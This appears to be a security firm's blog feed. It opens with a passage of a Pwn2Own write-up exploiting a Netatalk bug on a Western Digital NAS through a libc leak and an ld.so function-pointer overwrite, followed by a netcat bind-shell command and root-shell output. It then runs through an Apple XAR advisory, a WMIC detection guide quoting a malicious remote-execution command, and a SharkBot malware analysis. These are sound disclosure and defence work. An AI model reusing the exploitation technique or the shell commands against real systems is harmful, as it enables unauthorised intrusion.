      0x7f6c581b6000     0x7f6c581b7000     0x1000     0x3000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b7000     0x7f6c581b8000     0x1000     0x3000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b8000     0x7f6c581b9000     0x1000     0x4000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b9000     0x7f6c581ba000     0x1000        0x0 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581ba000     0x7f6c581bb000     0x1000     0x1000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581bb000     0x7f6c581bc000     0x1000     0x2000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581bc000     0x7f6c581bd000     0x1000     0x2000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581bd000     0x7f6c581be000     0x1000     0x3000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581be000     0x7f6c581bf000     0x1000        0x0 /lib/ld-2.28.so
      0x7f6c581bf000     0x7f6c581dd000    0x1e000     0x1000 /lib/ld-2.28.so
      0x7f6c581dd000     0x7f6c581e5000     0x8000    0x1f000 /lib/ld-2.28.so
      0x7f6c581e5000     0x7f6c581e6000     0x1000    0x26000 /lib/ld-2.28.so
      0x7f6c581e6000     0x7f6c581e7000     0x1000    0x27000 /lib/ld-2.28.so
      0x7f6c581e7000     0x7f6c581e8000     0x1000        0x0 
      0x7ffe86f2b000     0x7ffe86f71000    0x46000        0x0 [stack]
      0x7ffe86fb7000     0x7ffe86fba000     0x3000        0x0 [vvar]
      0x7ffe86fba000     0x7ffe86fbc000     0x2000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]

This means we could use the memmove() to overwrite some data in one of the mentioned libraries. But what library to target?

While debugging, we noticed that when a crash occurs, if we continue execution, a special exception handler in Netatalk catches the exception to handle it.

More specifically, we overwrote the whole ld-2.28.so .data section and ended up with the following crash:

(remote-gdb) bt
#0  0x00007f423de3eb50 in _dl_open (file=0x7f423dbf0e86 "libgcc_s.so.1", mode=-2147483646, caller_dlopen=0x7f423db771c5 <init+21>, nsid=-2, argc=4, argv=0x7fffa4967cf8, env=0x7fffa4967d20) at dl-open.c:548
#1  0x00007f423dba406d in do_dlopen (Reading in symbols for dl-error.c...done.
[email protected]=0x7fffa4966170) at dl-libc.c:96
#2  0x00007f423dba4b2f in __GI__dl_catch_exception ([email protected]=0x7fffa49660f0, [email protected]=0x7f423dba4030 <do_dlopen>, [email protected]=0x7fffa4966170) at dl-error-skeleton.c:196
#3  0x00007f423dba4bbf in __GI__dl_catch_error ([email protected]=0x7fffa4966148, [email protected]=0x7fffa4966150, [email protected]=0x7fffa4966147, [email protected]=0x7f423dba4030 <do_dlopen>, [email protected]=0x7fffa4966170) at dl-error-skeleton.c:215
#4  0x00007f423dba4147 in dlerror_run ([email protected]=0x7f423dba4030 <do_dlopen>, [email protected]=0x7fffa4966170) at dl-libc.c:46
#5  0x00007f423dba41d6 in __GI___libc_dlopen_mode ([email protected]=0x7f423dbf0e86 "libgcc_s.so.1", [email protected]=-2147483646) at dl-libc.c:195
#6  0x00007f423db771c5 in init () at backtrace.c:53
Reading in symbols for pthread_once.c...done.
#7  0x00007f423dc40997 in __pthread_once_slow (once_control=0x7f423dc2ef80 <once>, init_routine=0x7f423db771b0 <init>) at pthread_once.c:116
#8  0x00007f423db77304 in __GI___backtrace (array=<optimised out>, size=<optimised out>) at backtrace.c:106
#9  0x00007f423ddcd6db in netatalk_panic () from symbols/lib64/libatalk.so.18
#10 0x00007f423ddcd902 in ?? () from symbols/lib64/libatalk.so.18
#11 0x00007f423ddcd958 in ?? () from symbols/lib64/libatalk.so.18
Reading in symbols for ../sysdeps/unix/sysv/linux/x86_64/sigaction.c...done.
#12 <signal handler called>
#13 __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:238
#14 0x00007f423dda6fd0 in ad_rebuild_adouble_header_osx () from symbols/lib64/libatalk.so.18
#15 0x00007f423ddaa985 in ?? () from symbols/lib64/libatalk.so.18
#16 0x00007f423ddaaf34 in ?? () from symbols/lib64/libatalk.so.18
#17 0x00007f423ddad7b0 in ?? () from symbols/lib64/libatalk.so.18
#18 0x00007f423ddad9e1 in ?? () from symbols/lib64/libatalk.so.18
#19 0x00007f423ddae56c in ad_open () from symbols/lib64/libatalk.so.18
#20 0x000055cd275c1ea7 in afp_openfork ()
#21 0x000055cd275a386e in afp_over_dsi ()
#22 0x000055cd275c6ba3 in ?? ()
#23 0x000055cd275c68fd in main ()

We can see that it crashes on a call instruction where we control both the first argument and the argument.

(remote-gdb) x /i $pc
=> 0x7f423de3eb50 <_dl_open+48>:	call   QWORD PTR [rip+0x16412]        # 0x7f423de54f68 <_rtld_global+3848>
(remote-gdb) x /gx 0x7f423de54f68
0x7f423de54f68 <_rtld_global+3848>:	0x4242424242424242
(remote-gdb) x /s $rdi
0x7f423de54968 <_rtld_global+2312>:	'A' <repeats 35 times>

Checking ld-2.28.so in IDA, we see that it is due to dl_open() calling the _dl_rtld_lock_recursive function pointer and passing a pointer to the _dl_load_lock lock.

void *__fastcall dl_open(
        const char *file,
        int mode,
        const void *caller_dlopen,
        Lmid_t nsid,
        int argc,
        char **argv,
        char **env)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  if ( (mode & 3) == 0 )
    _dl_signal_error(0x16, file, 0LL, "invalid mode for dlopen()");
  rtld_local._dl_rtld_lock_recursive(&rtld_local._dl_load_lock);

Both the function pointer and the lock argument are part of the _rtld_local global which resides in the .data section.

.data:0000000000028060 ; rtld_global rtld_local
.data:0000000000028060 _rtld_local     dq 0  

This makes it a quite generic method to call an arbitrary function with one argument when we are able to overwrite the ld.so .data section.

NOTE: there was a similar technique (though a bit different) detailed in here.

Our goal is to execute an arbitrary command by overwriting the lock to contain a shell command to execute and overwriting the function pointer with the system() address.

Luckily, we know already that we have controlled data passed to the system() function, so we don’t need to know where it is in memory. However, due to ASLR, we have no idea where the system() function is. So we need some kind of leak primitive to bypass ASLR.

Building a leak primitive

If we look again at the previous backtrace, we see it actually crashed in ad_rebuild_adouble_header_osx(). More specifically we see that the following happens in ad_convert_osx():

  • The original AppleDouble file is mapped in memory with mmap()
  • The previously discussed memmove() is called to discard the FinderInfo part
  • ad_rebuild_adouble_header_osx() is called
  • The mapped file is unmapped with munmap()
//netatalk-3.1.12/libatalk/adouble/ad_open.c
/**
 * Convert from Apple's ._ file to Netatalk
 *
 * Apple's AppleDouble may contain a FinderInfo entry longer then 32 bytes
 * containing packed xattrs. Netatalk can't deal with that, so we
 * simply discard the packed xattrs.
 *
 * As we call ad_open() which might result in a recursion, just to be sure
 * use static variable in_conversion to check for that.
 *
 * Returns -1 in case an error occured, 0 if no conversion was done, 1 otherwise
 **/
static int ad_convert_osx(const char *path, struct adouble *ad)
{
    EC_INIT;
    static bool in_conversion = false;
    char *map;
    int finderlen = ad_getentrylen(ad, ADEID_FINDERI);
    ssize_t origlen;

    if (in_conversion || finderlen == ADEDLEN_FINDERI)
        return 0;
    in_conversion = true;

    LOG(log_debug, logtype_ad, "Converting OS X AppleDouble %s, FinderInfo length: %d",
        fullpathname(path), finderlen);

    origlen = ad_getentryoff(ad, ADEID_RFORK) + ad_getentrylen(ad, ADEID_RFORK);

    map = mmap(NULL, origlen, PROT_READ | PROT_WRITE, MAP_SHARED, ad_reso_fileno(ad), 0);
    if (map == MAP_FAILED) {
        LOG(log_error, logtype_ad, "mmap AppleDouble: %s\n", strerror(errno));
        EC_FAIL;
    }

    memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,
            map + ad_getentryoff(ad, ADEID_RFORK),
            ad_getentrylen(ad, ADEID_RFORK));

    ad_setentrylen(ad, ADEID_FINDERI, ADEDLEN_FINDERI);
    ad->ad_rlen = ad_getentrylen(ad, ADEID_RFORK);
    ad_setentryoff(ad, ADEID_RFORK, ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI);

    EC_ZERO_LOG( ftruncate(ad_reso_fileno(ad),
                           ad_getentryoff(ad, ADEID_RFORK)
                           + ad_getentrylen(ad, ADEID_RFORK)) );

    (void)ad_rebuild_adouble_header_osx(ad, map);
    munmap(map, origlen);

The ad_rebuild_adouble_header_osx() function is shown below. This function is responsible for writing back the content of the adouble structure into the mapped file region in the AppleDouble format so it is saved into the file on disk.

//netatalk-3.1.12/libatalk/adouble/ad_flush.c
/*!
 * Prepare adbuf buffer from struct adouble for writing on disk
 */
int ad_rebuild_adouble_header_osx(struct adouble *ad, char *adbuf)
{
    uint32_t       temp;
    uint16_t       nent;
    char           *buf;

    LOG(log_debug, logtype_ad, "ad_rebuild_adouble_header_osx");

    buf = &adbuf[0];

    temp = htonl( ad->ad_magic );
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl( ad->ad_version );
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    memcpy(buf, AD_FILLER_NETATALK, strlen(AD_FILLER_NETATALK));
    buf += sizeof( ad->ad_filler );

    nent = htons(ADEID_NUM_OSX);
    memcpy(buf, &nent, sizeof( nent ));
    buf += sizeof( nent );

    /* FinderInfo */
    temp = htonl(EID_DISK(ADEID_FINDERI));
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl(ADEDOFF_FINDERI_OSX);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl(ADEDLEN_FINDERI);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    memcpy(adbuf + ADEDOFF_FINDERI_OSX, ad_entry(ad, ADEID_FINDERI), ADEDLEN_FINDERI);

    /* rfork */
    temp = htonl( EID_DISK(ADEID_RFORK) );
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl(ADEDOFF_RFORK_OSX);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    temp = htonl( ad->ad_rlen);
    memcpy(buf, &temp, sizeof( temp ));
    buf += sizeof( temp );

    return AD_DATASZ_OSX;
}

But if we look at the memcpy() argument in the debugger, we notice that the source argument is actually referenced from the stack and out of bound:

memcpy(0x7f423de20032, 0x7fffa499bbba, 32)
(gdb) info proc mappings 
...
          Start Addr           End Addr       Size     Offset objfile
      0x7fffa4923000     0x7fffa4969000    0x46000        0x0 [stack]
      0x7fffa49f9000     0x7fffa49fc000     0x3000        0x0 [vvar]
      0x7fffa49fc000     0x7fffa49fe000     0x2000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]

If you look at the ad_header_read_osx() code previously mentioned, you’ll notice it is confirmed since there is a struct adouble adosx; local variable (hence stored on the stack) that is passed all the way to ad_rebuild_adouble_header_osx().

So what does it mean? Well, the memcpy() writes 32 bytes from a stack controlled offset into the memory mapped file region. This means we can make it write arbitrary memory back into the file on disk. Then we can read the fork file (stored in the AppleDouble file format) using SMB and we can leak that content back to us.

That’s nice, but is there any libc.so address stored on the stack since we want to call system() which resides in libc.so?

It turns out there is one such address since main() is called from __libc_start_main():

.text:0000000000023FB0 __libc_start_main proc near 
...
.text:0000000000024099                 call    rax             ; main()
.text:000000000002409B
.text:000000000002409B loc_2409B:                              ; CODE XREF: __libc_start_main+15A↓j
.text:000000000002409B                 mov     edi, eax
.text:000000000002409D                 call    __GI_exit

Wrapping up

By default on the Western Digital PR4100, we can read and write files both in AFP and SMB without requiring authentication, as long as we do it on the Public share.

We also know that an afpd child process is forked from the afpd parent process to handle every client connection. This means that every child process has the same randomisation for all already loaded libraries.

To trigger the vulnerability, we need that a mooncake regular file exists, as well as a careful crafted associated ._mooncake fork file in the same directory. Then we can call the "FPOpenFork" command over AFP on the mooncake file and it parses the ._mooncake fork file (stored in the AppleDouble file format). It ends up calling the ad_convert_osx() function which is responsible for converting the Apple’s AppleDouble file to a simplified version implemented in Netatalk.

So we first start by creating the mooncake file. We do it using AFP but we think we could have done it using SMB too. Then we want to trigger the vulnerability twice.

The first time, we craft the ._mooncake fork file to abuse the memcpy() in ad_rebuild_adouble_header_osx(). When triggering the vulnerability:

  • The ._mooncake original fork file is mapped in memory with mmap()
  • The memcpy() function writes the return address in __libc_start_main() into the mapped region
  • The munmap() function is called and that data is saved into the ._mooncake fork file on disk.
  • We can leak that data back to us by reading the ._mooncake fork file over SMB (as if it was a regular file)

This allows deducing the libc.so base address and computing the system() address.

The second time, we craft the ._mooncake fork file to abuse the memmove() in ad_convert_osx(). When triggering the vulnerability:

  • The ._mooncake original fork file is mapped in memory with mmap()
  • The memmove() function overwrites the ld.so .data section to corrupt the rtld_local._dl_rtld_lock_recursive function pointer with the system() address and the rtld_local._dl_load_lock data with the shell command to execute
  • The memcpy() function crashes due to an invalid access to an unmapped stack address
  • The exception handler registered in Netatalk calls into dl_open() which makes it call system() on our arbitrary shell command

We chose to preliminary drop a statically compiled netcat using SMB and execute it from the following path: /mnt/HD/HD_a2/Public/tools/netcat -nvlp 9999 -e /bin/sh.

Below is the exploit in action:

# ./mooncake.py -i 192.168.1.3
(12:26:23) [*] Triggering leak...
(12:26:27) [*] Connected to AFP server
(12:26:27) [*] Leaked libc return address: 0x7f45e23f809b
(12:26:27) [*] libc base: 0x7f45e23d4000
(12:26:27) [*] Triggering system() call...
(12:26:27) [*] Using system address: 0x7f45e24189c0
(12:26:27) [*] Connected to AFP server
(12:26:29) [*] Connection timeout detected :)
(12:26:30) [*] Spawning a shell. Type any command.
uname -a
Linux MyCloudPR4100 4.14.22 #1 SMP Mon Dec 21 02:16:13 UTC 2020 Build-32 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) euid=501(nobody) egid=1000(share) groups=1000(share)
pwd
/mnt/HD/HD_a2/Public/edg

Pwn2Own Note

Whilst using the exploit within the competition, the exploit failed on the first attempt during the leak phase. We guessed that this may have been a timing issue with the environment compared to our test environment. Therefore we modified the code to introduce a ‘sleep()’ before leaking to ensure that samba would return the data modified by vulnerable AFP code. Our second attempt got the leak working but failed when trying to connect over telnet, so we added another ‘sleep()’ before connecting over telnet to ensure that the ‘system()’ command was executed correctly. Luckily this worked and this shows that just adding more sleeps is enough to fix unreliable exploits and we were successful on our third and final attempt 🙂

Tool Release – ScoutSuite 5.11.0

We’re proud to announce the release of a new version of our open-source, multi-cloud auditing tool ScoutSuite (on Github)!

The most significant improvements and features added include:

  • Core
    • Improved CLI options, test coverage and some dependencies
  • AWS
    • Added new findings for multiple services
    • Bug fixes
    • Added ARNs for all resources
  • Azure
    • Added new findings
    • Bug fixes
  • GCP
    • New ruleset for GCP CIS version 1.1
    • Added support for multiple resources
    • Included a good number of new findings, most of which were added to the default ruleset
    • Bug fixes

Check out the Github page for additional information, as well as the wiki documentation!

For those wanting a Software-as-a-Service version, we also offer NCC Scout. This service includes persistent monitoring, as well as coverage of additional services across the three major public cloud platforms. If you would like to hear more, reach out to [email protected] or visit our cyberstore!

Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)

15 March 2022 at 19:34
Vendor: Apple
Vendor URL: https://www.apple.com/
Systems Affected: macOS Monterey before 12.3, macOS Big Sur before 11.6.5 and macOS 10.15 Catalina before Security Update 2022-003
Author: Richard Warren <richard.warren[at]nccgroup[dot]trust>
Advisory URLs: https://support.apple.com/en-us/HT213183, https://support.apple.com/en-us/HT213185, https://support.apple.com/en-gw/HT213185
CVE Identifier: CVE-2022-22582
Risk: 5.0 Medium CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Summary

In October 2021, Apple released a fix for CVE-2021-30833. This was an arbitrary file-write vulnerability in the xar utility and was due to improper handling of path separation (forward-slash) characters when processing files contained within directory symlinks.

Whilst analysing the patch for CVE-2021-30833, an additional vulnerability was identified which could allow for arbitrary file-write when unpacking a malicious XAR archive using the xar utility.

Impact

An attacker could construct a maliciously crafted .xar file, which when extracted by a user, would result in files being written to a location of the attacker’s choosing. This could be abused to gain Remote Code Execution.

Details

Following the patch of CVE-2021-30833, files containing a forward-slash within the name property would be converted to a : character instead, as shown in the screenshot below:

As mentioned in the previous advisory, when attempting to extract a .xar file which contains both a directory symlink and a directory with the same name, an error is encountered, as the directory is created before the symlink.

However, after some experimentation, it was noted that xar processes the Table of Contents (TOC) backwards, this is demonstrated in the following example.

First, we create a .xar file with a TOC containing three entries – a, b, and c:

When listing the contents, we can see that the symlink directory ‘c’ is processed first:

This means that putting a directory symlink before the real directory (i.e., first from the top-down) within the TOC would cause it to fail with the message shown previously – since xar will refuse to create a symlink if a directory with the same name already exists – at which point it will skip over the symlink creation and just write the file to the real directory instead.

However, if we put the symlink directory at the end of the TOC, this will cause the symlink directory creation to succeed but the real-directory creation to fail – but, crucially, xar continues execution anyway, creating the file within our newly-created symlink-directory.

In summary, this means if we create a TOC with a symlink directory at the end, and a directory containing a file at the beginning, we can cause xar to:

  1. First create the symlink directory
  2. Try to create the directory (and fail, but continue)
  3. Write the file into our symlink directory (achieving arbitrary file-write)

The following is an example of a TOC which exploits this vulnerability:

Now when extracting this file, we can see that the file /tmp/test is created successfully:

Recommendation

Upgrade to macOS Monterey 12.3, macOS Big Sur 11.6.5, macOS 10.15 Security Update 2022-003, or later.

Vendor Communication

2021-10-28 – Reported to Apple.
2022-03-14 – macOS 12.3, 11.6.5 and Security Update 2022-003 released, and Apple advisory published.
2022-03-15 – NCC Group advisory published.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2022-03-15

Written by:  Richard Warren

Microsoft announces the WMIC command is being retired, Long Live PowerShell

10 March 2022 at 01:15

Category:  Detection and Threat Hunting

What is WMIC?

The Windows Management Instrumentation (WMI) Command-Line Utility (WMIC) is a command-line utility that allows users to perform WMI operations from a command prompt. WMI is an interface providing a variety of Windows management functions. Applications and WMI scripts can be deployed to automate administrative tasks on remote computers or interface with other Windows tools like System Center Operations Manager (SCCM) or Windows Remote Management (WinRM).

Unfortunately for defenders, default WMIC logging is minimal and primarily runs directly in memory without writing any files to disk. Due to WMI’s built-in capabilities and small forensic surface area, attackers often weaponize WMI for all facets of the post-exploit attack chain.

Malicious WMIC Usage

  • cmd.exe /c “wmic /node:”10.123.34.123″ /user:”WorkGroup\Bob-admin” /password:”Summer2022″ PROCESS CALL CREATE “cmd.exe /c C:\ProgramData\regit.bat” >> C:\WINDOWS\TEMP\cb66E3.tmp

In the example above, an attacker has already gained Administrator privileges to execute a WMIC command. Here, the actor launches a malicious payload against a remote host and saves the results to a temp file. Fortunately for defenders, if command line audit logging is enabled, the Windows Security log would capture this execution under event ID 4688. However, these actions would not have been captured if the attacker simply called “wmic” and conducted their operations within the WMI console. There is no recorded logging by leveraging the console, making it a good tool for attackers to live off the land with little fear of detection.

Goodbye WMIC, Hello PowerShell

Microsoft is reportedly no longer developing the WMIC command-line tool and will be removed from Windows 11, 10, and Server builds going forward. However, WMI functionality will still be available via PowerShell. So now is a great time to consider how attackers will adjust to these developments and start tuning your detections accordingly.

Preparation

The default settings of Windows logging rarely will catch advanced attacks.  Therefore, Windows Advanced Audit Logging and PowerShell Audit Logging must be optimally configured to collect and allow detection and able to threat hunt for malicious WMI and similar attacks.

Organizations should have a standard procedure to configure the Windows Advanced Audit Policies as a part of a complete security program and have each Windows system collect locally significant events.  NCC Group recommends using the following resource to configure Windows Advanced Audit Policies:

  • Malware Archaeology Windows Logging Cheat Sheets
  • Malware Archaeology Windows PowerShell Logging Cheat Sheet

Log rotation can be another major issue with Windows default log settings.  By leveraging Group Policy, organizations should increase the default log size to support detection engineering and threat hunting, as outlined below.

Ideally, organizations should forward event logs to a log management or SIEM solution to operationalize detection alerts and provide a central console where threat hunting can be performed.  Alternatively, with optimally configured log sizes, teams can run tools such as PowerShell or LOG-MD to hunt for malicious activity against the local log data as well.  Properly configured logging will save time during incident response activities, allowing an organization to recover faster and spend less money on investigative and recovery efforts.

Detection and Threat Hunting Malicious WMI in PowerShell logging

WMI will generate log events that can be used to detect and hunt for indications of execution.  To collect Event ID 4104, the Windows PowerShell Audit Policy will need to have the following policy enabled:

  • PowerShell version 5 or later must be installed
    • Requires .Net 4.5 or later
  • Minimum Log size – 1,024,000kb or larger
  • There are two PowerShell logs
    • Windows PowerShell (legacy)
    • Applications and Services Logs – Microsoft-Windows-PowerShell/Operational
  • The following Group Policy must be set
    • ModuleLogging Reg_DWord =1 or ENABLED
    • ModuleNames Reg_Sz – Value = * and Data = *
    • ScriptBlockLogging Reg_DWord =1 or ENABLED

The following query logic can be used:

  • Event Log = PowerShell/Operational
  • Event IDs = 4100, 4103, 4104
  • User = Any user, especially administrative accounts
  • Path = Look for odd paths or PowerShell scripts
  • ScriptBlock = What was actually executed on the system that will contain the cmdlets listed below

WMI PowerShell cmdlets

The following PowerShell cmdlets should be monitored for suspicious/malicious activity:

  • Cmdlet          Get-WmiObject
  • Cmdlet          Invoke-WmiMethod
  • Cmdlet          Register-WmiEvent
  • Cmdlet          Remove-WmiObject
  • Cmdlet          Set-WmiInstance

Also, the following PowerShell CIM (Common Information Model) cmdlets should also be monitored as a replacement to older WMI cmdlets:

  • Cmdlet          Export-BinaryMiLog
  • Cmdlet          Get-CimAssociatedInstance
  • Cmdlet          Get-CimClass
  • Cmdlet          Get-CimInstance
  • Cmdlet          Get-CimSession
  • Cmdlet          Import-BinaryMiLog
  • Cmdlet          Invoke-CimMethod
  • Cmdlet          New-CimInstance
  • Cmdlet          New-CimSession
  • Cmdlet          New-CimSessionOption
  • Cmdlet          Register-CimIndicationEvent
  • Cmdlet          Remove-CimInstance
  • Cmdlet          Remove-CimSession
  • Cmdlet          Set-CimInstance        

Sample Log Management Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

event.provider="Microsoft-Windows-PowerShell" AND event.code=4104 // PowerShell WMI commandlets (winlog.event_data.ScriptBlockText="*Get-WmiObject*") or (winlog.event_data.ScriptBlockText="*Invoke-WmiMethod*") or (winlog.event_data.ScriptBlockText="*Register-WmiEvent*") or (winlog.event_data.ScriptBlockText="*Remove-WmiObject*") or (winlog.event_data.ScriptBlockText="*Set-WmiInstance*")  | UserName:=winlog.user.name | Domain:=winlog.user.domain | ScriptBlock:=winlog.event_data.ScriptBlockText | User_Type:=winlog.user.type | PID:=winlog.process.pid | Task:=winlog.task | Path:=winlog.event_data.Path | OpCode:=winlog.opcode | table([@timestamp, host.name, UserName, Domain, User_Type, Path, Task, OpCode, ScriptBlock])

Detection Engineering – Filtering Known Good

Once an output of all WMI PowerShell cmdlets is produced, you can start filtering known good activity to narrow the results to suspicious activity. Take the following example:

The following is a typical result that might be seen in the logs, and in this case excluded as a false positive or known good to reduce results.  The path of the PowerShell script or the actual PowerShell executed (ScriptBlock) is what to focus on.

In this example, our focus is on the highlighted PowerShell executed (ScriptBlock). Here the command is just checking the disk for an install routine which is typical on a Windows system.  From here, you can begin building out your detection logic to better find suspicious WMI PowerShell activity and support threat hunting efforts.  Play close attention to the names of the scripts, location of where the script executes, the context of the user executing the script, the quantity of systems the script runs on, and the calls being used in order to filter out the known good items.  Generally, directories that users have read-write access should be closely reviewed such as; C:\Users.

Conclusion

WMI and WMIC have been consistent attack vectors since their introduction. With the deprecation of WMIC, malicious usage WMI functionality with PowerShell will likely increase. We hope this information can assist your detection and threat hunting efforts to detect this and similar types of attacks. Happy Detection and Hunting!

Additional Reading and Resources

SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store


Authors:

  • Alberto Segura, Malware analyst
  • Rolf Govers, Malware analyst & Forensic IT Expert

NCC Group, as well as many other researchers noticed a rise in Android malware last year, especially Android banking malware. Within the Threat Intelligence team of NCC Group we’re looking closely to several of these malware families to provide valuable information to our customers about these threats. Next to the more popular Android banking malware NCC Group’s Threat Intelligence team also watches new trends and new families that arise and could be potential threats to our customers.

One of these ‘newer’ families is an Android banking malware called SharkBot. During our research we noticed that this malware was distributed via the official Google play store. After discovery we immediately notified Google and decided to share our knowledge via this blog post.

NCC Group’s Threat Intelligence team continues analysis of SharkBot and uncovering new findings. Shortly after we published this blogpost, we found several more SharkBot droppers in the Google Play Store. All appear to behave identically; in fact, the code seems to be a literal a ‘copy-paste’ in all of them. Also the same corresponding C2 server is used in all the other droppers. After discovery we immediately reported this to Google. See the IoCs section below for the Google Play Store URLs of the newly discovered SharkBot dropper apps.

Summary

SharkBot is an Android banking malware found at the end of October 2021 by the Cleafy Threat Intelligence Team. At the moment of writing the SharkBot malware doesn’t seem to have any relations with other Android banking malware like Flubot, Cerberus/Alien, Anatsa/Teabot, Oscorp, etc.

The Cleafy blogpost stated that the main goal of SharkBot is to initiate money transfers (from compromised devices) via Automatic Transfer Systems (ATS). As far as we observed, this technique is an advanced attack technique which isn’t used regularly within Android malware. It enables adversaries to auto-fill fields in legitimate mobile banking apps and initate money transfers, where other Android banking malware, like Anatsa/Teabot or Oscorp, require a live operator to insert and authorize money transfers. This technique also allows adversaries to scale up their operations with minimum effort.

The ATS features allow the malware to receive a list of events to be simulated, and them will be simulated in order to do the money transfers. Since this features can be used to simulate touches/clicks and button presses, it can be used to not only automatically transfer money but also install other malicious applications or components. This is the case of the SharkBot version that we found in the Google Play Store, which seems to be a reduced version of SharkBot with the minimum required features, such as ATS, to install a full version of the malware some time after the initial install.

Because of the fact of being distributed via the Google Play Store as a fake Antivirus, we found that they have to include the usage of infected devices in order to spread the malicious app. SharkBot achieves this by abusing the ‘Direct Reply‘ Android feature. This feature is used to automatically send reply notification with a message to download the fake Antivirus app. This spread strategy abusing the Direct Reply feature has been seen recently in another banking malware called Flubot, discovered by ThreatFabric.

What is interesting and different from the other families is that SharkBot likely uses ATS to also bypass multi-factor authentication mechanisms, including behavioral detection like bio-metrics, while at the same time it also includes more classic features to steal user’s credentials.

Money and Credential Stealing features

SharkBot implements the four main strategies to steal banking credentials in Android:

  • Injections (overlay attack): SharkBot can steal credentials by showing a WebView with a fake log in website (phishing) as soon as it detects the official banking app has been opened.
  • Keylogging: Sharkbot can steal credentials by logging accessibility events (related to text fields changes and buttons clicked) and sending these logs to the command and control server (C2).
  • SMS intercept: Sharkbot has the ability to intercept/hide SMS messages.
  • Remote control/ATS: Sharkbot has the ability to obtain full remote control of an Android device (via Accessibility Services).

For most of these features, SharkBot needs the victim to enable the Accessibility Permissions & Services. These permissions allows Android banking malware to intercept all the accessibility events produced by the interaction of the user with the User Interface, including button presses, touches, TextField changes (useful for the keylogging features), etc. The intercepted accessibility events also allow to detect the foreground application, so banking malware also use these permissions to detect when a targeted app is open, in order to show the web injections to steal user’s credentials.

Delivery

Sharkbot is distributed via the Google Play Store, but also using something relatively new in the Android malware: ‘Direct reply‘ feature for notifications. With this feature, the C2 can provide as message to the malware which will be used to automatically reply the incoming notifications received in the infected device. This has been recently introduced by Flubot to distribute the malware using the infected devices, but it seems SharkBot threat actors have also included this feature in recent versions.

In the following image we can see the code of SharkBot used to intercept new notifications and automatically reply them with the received message from the C2.

In the following picture we can see the ‘autoReply’ command received by our infected test device, which contains a shortten Bit.ly link which redirects to the Google Play Store sample.

We detected the SharkBot reduced version published in the Google Play on 28th February, but the last update was on 10th February, so the app has been published for some time now. This reduced version uses a very similar protocol to communicate with the C2 (RC4 to encrypt the payload and Public RSA key used to encrypt the RC4 key, so the C2 server can decrypt the request and encrypt the response using the same key). This SharkBot version, which we can call SharkBotDropper is mainly used to download a fully featured SharkBot from the C2 server, which will be installed by using the Automatic Transfer System (ATS) (simulating click and touches with the Accessibility permissions).

This malicious dropper is published in the Google Play Store as a fake Antivirus, which really has two main goals (and commands to receive from C2):

  • Spread the malware using ‘Auto reply’ feature: It can receive an ‘autoReply’ command with the message that should be used to automatically reply any notification received in the infected device. During our research, it has been spreading the same Google Play dropper via a shorten Bit.ly URL.
  • Dropper+ATS: The ATS features are used to install the downloaded SharkBot sample obtained from the C2. In the following image we can see the decrypted response received from the C2, in which the dropper receives the command ‘b‘ to download the full SharkBot sample from the provided URL and the ATS events to simulate in order to get the malware installed.

With this command, the app installed from the Google Play Store is able to install and enable Accessibility Permissions for the fully featured SharkBot sample it downloaded. It will be used to finally perform the ATS fraud to steal money and credentials from the victims.

The fake Antivirus app, the SharkBotDropper, published in the Google Play Store has more than 1,000 downloads, and some fake comments like ‘It works good’, but also other comments from victims that realized that this app does some weird things.

Technical analysis

Protocol & C2

The protocol used to communicate with the C2 servers is an HTTP based protocol. The HTTP requests are made in plain, since it doesn’t use HTTPs. Even so, the actual payload with the information sent and received is encrypted using RC4. The RC4 key used to encrypt the information is randomly generated for each request, and encrypted using the RSA Public Key hardcoded in each sample. That way, the C2 can decrypt the encrypted key (rkey field in the HTTP POST request) and finally decrypt the sent payload (rdata field in the HTTP POST request).

If we take a look at the decrypted payload, we can see how SharkBot is simply using JSON to send different information about the infected device and receive the commands to be executed from the C2. In the following image we can see the decrypted RC4 payload which has been sent from an infected device.

Two important fields sent in the requests are:

  • ownerID
  • botnetID

Those parameters are hardcoded and have the same value in the analyzed samples. We think those values can be used in the future to identify different buyers of this malware, which based on our investigation is not being sold in underground forums yet.

Domain Generation Algorithm

SharkBot includes one or two domains/URLs which should be registered and working, but in case the hardcoded C2 servers were taken down, it also includes a Domain Generation Algorithm (DGA) to be able to communicate with a new C2 server in the future.

